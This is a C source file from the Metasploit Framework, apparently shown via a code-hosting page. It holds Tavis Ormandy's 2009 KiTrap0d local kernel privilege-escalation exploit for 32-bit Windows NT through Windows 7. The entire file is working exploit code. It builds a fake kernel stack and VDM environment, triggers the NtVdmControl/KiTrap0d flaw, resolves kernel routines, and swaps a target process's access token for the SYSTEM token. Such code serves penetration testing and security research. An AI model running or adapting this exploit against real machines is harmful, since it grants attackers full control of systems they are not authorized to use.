metasploit-framework/external/source/kitrap0d/vdmexploit.c

358 lines
13 KiB
C
Raw Normal View History

//
// --------------------------------------------------
// Windows NT/2K/XP/2K3/VISTA/2K8/7 NtVdmControl()->KiTrap0d local ring0 exploit
// -------------------------------------------- taviso@sdf.lonestar.org ---
//
// Tavis Ormandy, June 2009.
//
// Tested on:
// $ cmd /c ver
// Microsoft Windows [Version 5.2.3790]
//
// This file contains the exploit payload and VDM Subsystem control routines.
//
#ifndef WIN32_NO_STATUS
# define WIN32_NO_STATUS // I prefer the definitions from ntstatus.h
#endif
#include <windows.h>
#include <assert.h>
#include <stdio.h>
#include <winerror.h>
#include <winternl.h>
#include <stddef.h>
#ifdef WIN32_NO_STATUS
# undef WIN32_NO_STATUS
#endif
#include <ntstatus.h>
// Process to escalate to SYSTEM
static DWORD TargetPid;
// Pointer to fake kernel stack.
static PDWORD KernelStackPointer;
#define KernelStackSize 1024
// Enforce byte alignment by default
#pragma pack(1)
// Kernel module handle
static HMODULE KernelHandle;
// Eflags macros
#define EFLAGS_CF_MASK 0x00000001 // carry flag
#define EFLAGS_PF_MASK 0x00000004 // parity flag
#define EFLAGS_AF_MASK 0x00000010 // auxiliary carry flag
#define EFLAGS_ZF_MASK 0x00000040 // zero flag
#define EFLAGS_SF_MASK 0x00000080 // sign flag
#define EFLAGS_TF_MASK 0x00000100 // trap flag
#define EFLAGS_IF_MASK 0x00000200 // interrupt flag
#define EFLAGS_DF_MASK 0x00000400 // direction flag
#define EFLAGS_OF_MASK 0x00000800 // overflow flag
#define EFLAGS_IOPL_MASK 0x00003000 // I/O privilege level
#define EFLAGS_NT_MASK 0x00004000 // nested task
#define EFLAGS_RF_MASK 0x00010000 // resume flag
#define EFLAGS_VM_MASK 0x00020000 // virtual 8086 mode
#define EFLAGS_AC_MASK 0x00040000 // alignment check
#define EFLAGS_VIF_MASK 0x00080000 // virtual interrupt flag
#define EFLAGS_VIP_MASK 0x00100000 // virtual interrupt pending
#define EFLAGS_ID_MASK 0x00200000 // identification flag
#ifndef PAGE_SIZE
# define PAGE_SIZE 0x1000
#endif
// http://svn.reactos.org/reactos/trunk/reactos/include/ndk/ketypes.h
enum { VdmStartExecution = 0, VdmInitialize = 3 };
VOID FirstStage();
BOOL InitializeVdmSubsystem();
PVOID KernelGetProcByName(PSTR);
BOOL FindAndReplaceMember(PDWORD, DWORD, DWORD, DWORD, BOOL);
// This routine is where I land after successfully triggering the vulnerability.
VOID FirstStage()
{
FARPROC DbgPrint;
FARPROC PsGetCurrentThread;
FARPROC PsGetCurrentThreadStackBase, PsGetCurrentThreadStackLimit;
FARPROC PsLookupProcessByProcessId;
FARPROC PsReferencePrimaryToken;
FARPROC ZwTerminateProcess;
PVOID CurrentThread;
PVOID TargetProcess, *PsInitialSystemProcess;
DWORD StackBase, StackLimit;
DWORD i;
// Keep interrupts off until I've repaired my KTHREAD.
__asm cli
// Resolve some routines I need from the kernel export directory
DbgPrint = KernelGetProcByName("DbgPrint");
PsGetCurrentThread = KernelGetProcByName("PsGetCurrentThread");
PsGetCurrentThreadStackBase = KernelGetProcByName("PsGetCurrentThreadStackBase");
PsGetCurrentThreadStackLimit = KernelGetProcByName("PsGetCurrentThreadStackLimit");
PsInitialSystemProcess = KernelGetProcByName("PsInitialSystemProcess");
PsLookupProcessByProcessId = KernelGetProcByName("PsLookupProcessByProcessId");
PsReferencePrimaryToken = KernelGetProcByName("PsReferencePrimaryToken");
ZwTerminateProcess = KernelGetProcByName("ZwTerminateProcess");
CurrentThread = (PVOID) PsGetCurrentThread();
StackLimit = (DWORD) PsGetCurrentThreadStackLimit();
StackBase = (DWORD) PsGetCurrentThreadStackBase();
DbgPrint("FirstStage() Loaded, CurrentThread @%p Stack %p - %p",
CurrentThread,
StackBase,
StackLimit);
// First I need to repair my CurrentThread, find all references to my fake kernel
// stack and repair them. Note that by "repair" I mean randomly point them
// somewhere inside the real stack.
DbgPrint("Repairing references to %p-%p in CurrentThread@%p...",
&KernelStackPointer[0],
&KernelStackPointer[KernelStackSize - 1],
CurrentThread);
// For every stack location, try to find all references to it in my
// CurrentThread.
for (i = 0; i < KernelStackSize; i++) {
// The size of this structure varies between kernels, whats the maximum
// size likely to be?
CONST DWORD MaxExpectedEthreadSize = 0x200;
// Find and repair all references to this location
while (FindAndReplaceMember((PDWORD) CurrentThread,
(DWORD) &KernelStackPointer[i],
(DWORD) StackBase - ((StackBase - StackLimit) / 2),
MaxExpectedEthreadSize,
FALSE))
;
}
// Find the EPROCESS structure for the process I want to escalate
if (PsLookupProcessByProcessId(TargetPid, &TargetProcess) == STATUS_SUCCESS) {
PACCESS_TOKEN SystemToken;
PACCESS_TOKEN TargetToken;
// What's the maximum size the EPROCESS structure is ever likely to be?
CONST DWORD MaxExpectedEprocessSize = 0x200;
DbgPrint("PsLookupProcessByProcessId(%u) => %p", TargetPid, TargetProcess);
DbgPrint("PsInitialSystemProcess @%p", *PsInitialSystemProcess);
// Find the Token object for my target process, and the SYSTEM process.
TargetToken = (PACCESS_TOKEN) PsReferencePrimaryToken(TargetProcess);
SystemToken = (PACCESS_TOKEN) PsReferencePrimaryToken(*PsInitialSystemProcess);
DbgPrint("PsReferencePrimaryToken(%p) => %p", TargetProcess, TargetToken);
DbgPrint("PsReferencePrimaryToken(%p) => %p", *PsInitialSystemProcess, SystemToken);
// Find the token in the target process, and replace with the system token.
FindAndReplaceMember((PDWORD) TargetProcess,
(DWORD) TargetToken,
(DWORD) SystemToken,
MaxExpectedEprocessSize,
TRUE);
// Success, try to terminate the current process.
ZwTerminateProcess(GetCurrentProcess(), 'w00t');
} else {
// Maybe the user closed the window?
DbgPrint("PsLookupProcessByProcessId(%u) Failed", TargetPid);
// Report this failure
ZwTerminateProcess(GetCurrentProcess(), 'LPID');
}
// Oops, Something went wrong, restore interrupts and spin here.
__asm sti
for (;;) __asm pause
}
// Search the specified data structure for a member with CurrentValue.
BOOL FindAndReplaceMember(PDWORD Structure,
DWORD CurrentValue,
DWORD NewValue,
DWORD MaxSize,
BOOL ObjectRefs)
{
DWORD i, Mask;
// Microsoft QWORD aligns object pointers, then uses the lower three
// bits for quick reference counting (nice trick).
Mask = ObjectRefs ? ~7 : ~0;
// Mask out the reference count.
CurrentValue &= Mask;
// Scan the structure for any occurrence of CurrentValue.
for (i = 0; i < MaxSize; i++) {
if ((Structure[i] & Mask) == CurrentValue) {
// And finally, replace it with NewValue.
Structure[i] = NewValue;
return TRUE;
}
}
// Member not found.
return FALSE;
}
// Find an exported kernel symbol by name.
PVOID KernelGetProcByName(PSTR SymbolName)
{
PUCHAR ImageBase;
PULONG NameTable;
PULONG FunctionTable;
PUSHORT OrdinalTable;
PIMAGE_EXPORT_DIRECTORY ExportDirectory;
PIMAGE_DOS_HEADER DosHeader;
PIMAGE_NT_HEADERS PeHeader;
DWORD i;
ImageBase = (PUCHAR) KernelHandle;
DosHeader = (PIMAGE_DOS_HEADER) ImageBase;
PeHeader = (PIMAGE_NT_HEADERS)(ImageBase + DosHeader->e_lfanew);
ExportDirectory = (PIMAGE_EXPORT_DIRECTORY)(ImageBase
+ PeHeader->OptionalHeader
. DataDirectory[IMAGE_DIRECTORY_ENTRY_EXPORT]
. VirtualAddress);
// Find required tablesa from the ExportDirectory.
NameTable = (PULONG)(ImageBase + ExportDirectory->AddressOfNames);
FunctionTable = (PULONG)(ImageBase + ExportDirectory->AddressOfFunctions);
OrdinalTable = (PUSHORT)(ImageBase + ExportDirectory->AddressOfNameOrdinals);
// Scan each entry for a matching name.
for (i = 0; i < ExportDirectory->NumberOfNames; i++) {
PCHAR Symbol = ImageBase + NameTable[i];
if (strcmp(Symbol, SymbolName) == 0) {
// Symbol found, return the appropriate entry from FunctionTable.
return (PVOID)(ImageBase + FunctionTable[OrdinalTable[i]]);
}
}
// Symbol not found, this is likely fatal :-(
return NULL;
}
// Exploit entrypoint.
BOOL APIENTRY DllMain(HMODULE Module, DWORD Reason, LPVOID Reserved)
{
CONST DWORD MinimumExpectedVdmTibSize = 0x400;
CONST DWORD MaximumExpectedVdmTibSize = 0x800;
FARPROC NtVdmControl;
DWORD KernelStack[KernelStackSize];
DWORD Ki386BiosCallReturnAddress;
CHAR Pid[32], Off[32], Krn[32];
struct {
ULONG Size;
PVOID Padding0;
PVOID Padding1;
CONTEXT Padding2;
CONTEXT VdmContext;
DWORD Padding3[1024];
} VdmTib = {0};
// Initialise these structures with recognisable constants to ease debugging.
FillMemory(&VdmTib, sizeof VdmTib, 'V');
FillMemory(&KernelStack, sizeof KernelStack, 'K');
// Parent passes parameters via environment variables.
//
// - VDM_TARGET_PID
// Pid of the process to transplant a SYSTEM token onto.
// - VDM_TARGET_OFF
// Offset from ntoskrnl of Ki386BiosCallReturnAddress.
// - VDM_TARGET_KRN
// Ntoskrnl base address.
GetEnvironmentVariable("VDM_TARGET_PID", Pid, sizeof Pid);
GetEnvironmentVariable("VDM_TARGET_KRN", Krn, sizeof Krn);
GetEnvironmentVariable("VDM_TARGET_OFF", Off, sizeof Off);
NtVdmControl = GetProcAddress(GetModuleHandle("NTDLL"), "NtVdmControl");
TargetPid = strtoul(Pid, NULL, 0);
// Setup the fake kernel stack, and install a minimal VDM_TIB,
KernelStackPointer = KernelStack;
KernelStack[0] = (DWORD) &KernelStack[8]; // Esp
KernelStack[1] = (DWORD) NtCurrentTeb(); // Teb
KernelStack[2] = (DWORD) NtCurrentTeb(); // Teb
KernelStack[7] = (DWORD) FirstStage; // RetAddr
KernelHandle = (HMODULE) strtoul(Krn, NULL, 0);
VdmTib.Size = MinimumExpectedVdmTibSize;
*NtCurrentTeb()->Reserved4 = &VdmTib;
// Initialize the VDM Subsystem.
InitializeVdmSubsystem();
VdmTib.Size = MinimumExpectedVdmTibSize;
VdmTib.VdmContext.SegCs = 0x0B;
VdmTib.VdmContext.Esi = (DWORD) &KernelStack;
VdmTib.VdmContext.Eip = strtoul(Krn, NULL, 0) + strtoul(Off, NULL, 0);
VdmTib.VdmContext.EFlags = EFLAGS_TF_MASK;
*NtCurrentTeb()->Reserved4 = &VdmTib;
// Trigger the vulnerable code via NtVdmControl().
while (VdmTib.Size++ < MaximumExpectedVdmTibSize)
NtVdmControl(VdmStartExecution, NULL);
// Unable to find correct VdmTib size.
ExitThread('VTIB');
}
// Setup a minimal execution environment to satisfy NtVdmControl().
BOOL InitializeVdmSubsystem()
{
FARPROC NtAllocateVirtualMemory;
FARPROC NtFreeVirtualMemory;
FARPROC NtVdmControl;
PBYTE BaseAddress;
ULONG RegionSize;
static DWORD TrapHandler[128];
static DWORD IcaUserData[128];
static struct {
PVOID TrapHandler;
PVOID IcaUserData;
} InitData;
NtAllocateVirtualMemory = GetProcAddress(GetModuleHandle("NTDLL"), "NtAllocateVirtualMemory");
NtFreeVirtualMemory = GetProcAddress(GetModuleHandle("NTDLL"), "NtFreeVirtualMemory");
NtVdmControl = GetProcAddress(GetModuleHandle("NTDLL"), "NtVdmControl");
BaseAddress = (PVOID) 0x00000001;
RegionSize = (ULONG) 0x00000000;
InitData.TrapHandler = TrapHandler;
InitData.IcaUserData = IcaUserData;
// Remove anything currently mapped at NULL
NtFreeVirtualMemory(GetCurrentProcess(), &BaseAddress, &RegionSize, MEM_RELEASE);
BaseAddress = (PVOID) 0x00000001;
RegionSize = (ULONG) 0x00100000;
// Allocate the 1MB virtual 8086 address space.
if (NtAllocateVirtualMemory(GetCurrentProcess(),
&BaseAddress,
0,
&RegionSize,
MEM_COMMIT | MEM_RESERVE,
PAGE_EXECUTE_READWRITE) != STATUS_SUCCESS) {
ExitThread('NTAV');
return FALSE;
}
// Finalise the initialisation.
if (NtVdmControl(VdmInitialize, &InitData) != STATUS_SUCCESS) {
ExitThread('VDMC');
return FALSE;
}
return TRUE;
}